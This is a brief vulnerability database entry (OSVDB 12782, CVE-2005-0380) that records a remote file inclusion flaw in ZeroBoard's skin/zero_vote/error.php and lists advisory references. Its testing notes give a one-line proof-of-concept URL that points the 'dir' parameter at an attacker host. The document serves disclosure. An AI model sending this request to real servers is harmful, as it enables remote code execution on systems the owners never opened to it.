ZeroBoard error.php Arbitrary Command Execution

2005-01-08T08:10:23
ID OSVDB:12782
Type osvdb
Reporter OSVDB
Modified 2005-01-08T08:10:23

Description

Manual Testing Notes

http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker]

References:

Vendor URL: http://www.zeroboard.com/ Security Tracker: 1012812 Secunia Advisory ID:13769 Other Advisory URL: http://www.optik4lab.com/modules/news/article.php?storyid=13 Keyword: Remote File Inclusion CVE-2005-0380